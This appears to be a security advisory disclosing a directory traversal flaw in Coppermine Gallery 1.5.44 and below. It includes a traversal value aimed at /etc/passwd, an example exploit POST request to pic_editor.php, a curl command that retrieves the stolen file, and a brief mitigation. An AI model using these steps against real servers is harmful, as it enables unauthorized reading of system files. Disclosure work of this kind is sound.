Coppermine Gallery 1.5.44 Directory Traversal

Coppermine Gallery versions 1.5.44 and below suffer from a directory traversal vulnerability.

MD5 | ea866f35dc4615d7d9332fbdb8551ec7

Coppermine Gallery <= 1.5.44 directory traversal vulnerability
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory travesal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:


You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then by copied to a predictible path location as thumb.


To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

Content-Disposition: form-data; name="clipval"

Content-Disposition: form-data; name="newimage"

Content-Disposition: form-data; name="img_dir"

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="angle"

Content-Disposition: form-data; name="save_thumb"

Save as thumbnail

Example file download request
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
... snip

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have
sufficient rights to use this feature however.


-- Hacker Fantastic

Related Posts